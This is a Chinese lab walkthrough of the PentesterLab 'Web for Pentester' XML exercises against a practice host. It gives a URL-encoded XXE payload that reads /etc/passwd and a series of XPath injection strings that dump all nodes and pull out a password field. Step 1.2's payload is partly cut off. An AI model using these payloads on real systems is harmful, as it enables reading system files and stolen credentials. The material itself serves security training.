Web_for_Pentester是国外安全研究者开发的一款渗透测试平台,由PentesterLab出品。官方给自己的定义是一个简单又十分有效地学习渗透测试的演练平台。
XML attacks通常都是通过使用XPATH来恢复XML文件的解析设置来进行的。举个例子,如根据组织的名称来了解后台是如何对用户进行的身份验证。
【实验步骤】
一、Example1
1.1 XML attacks Example1的源代码example1.php如下。如图1所示
图 1
1.2 直接构造实体。在火狐浏览器地址栏输入http://vulnerable/xml/example1.php?
xml=
]>&xipu;,得到Warning信息。如图2所示
图 2
1.3 使用Burp Suite对]>&xipu;进行URL编码,得到其URL编码后的结果,复制得到的结果。如图3所示
图 3
1.4 在火狐浏览器地址栏输入URL地址http://vulnerable/xml/example1.php?xml=%3c%21%44%4f%43%54%59%50%45%20%73%69%6d%70%6c%65%77%61%72%65%20%5b%3c%21%45%4e%54%49%54%59%20%78%69%70%75%20%53%59%53%54%45%4d%20%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%3e%5d%3e%3c%63%3e%26%78%69%70%75%3b%3c%2f%63%3e%0a,成功获得passwd文件内容。如图4所示
图 4
二、Example2
2.1 由XML attacks Example2的源代码example2.php可知,在这个例子中,代码利用了用户输入,插入了一个XPath表达式。插入的XPath是一个查询语句,查询XML文档中的节点。把XML文档想象成一个数据库,XPath则是一个查询语句,如果你能操纵这个查询,你就能找到那些你本来无法找到的元素。如图5所示
图 5
2.2 和SQL注入相似,XPath允许使用逻辑判断,下面我们可以进行一些尝试。Example2默认name的值为hacker。如图6所示
图 6
2.3 在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ and ‘1’='1,得到相同的结果。如图7所示
图 7
2.4 在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ and ‘1’='0,得不到任何结果。如图8所示
图 8
2.5 在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ or ‘1’='0,得到相同的结果。如图9所示
图 9
2.6 在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ or ‘1’='1,得到所有的结果。如图10所示
图 10
2.7 基于这些测试和之前对于XPath的了解,我们大致可以得到该XPath语句的构造为:[PARENT NODES]/name[.=’ [INPUT] ‘]/[CHILD NODES]。要想注释掉余下的XPath语句,你可以使用空字符(你需要将其编码成%00)。正如我们在XPath表达式中所看到,我们还需要一个]来完成语法。在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’]%00,得到相同的结果。如图11所示
图 11
2.8 在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ or 1=1]%00,得到所有结果。如图12所示
图 12
2.9 查找当前节点的子节点,在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’] /child::node()%00,结果如下。如图13所示
图 13
2.10 若要再次回到节点层来获取更多信息。在XPath里,这可以通过使用parent::作为语句的部分来完成。查询当前节点的父节点,在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ or 1=1]/parent::/
child::node()%00,可以列出所有节点。如图14所示
图 14
2.11 其中一个节点的值看起来就像密码。我们可以通过使用语句hacker']/parent::*/password%00,
结果如下。如图15所示
图 15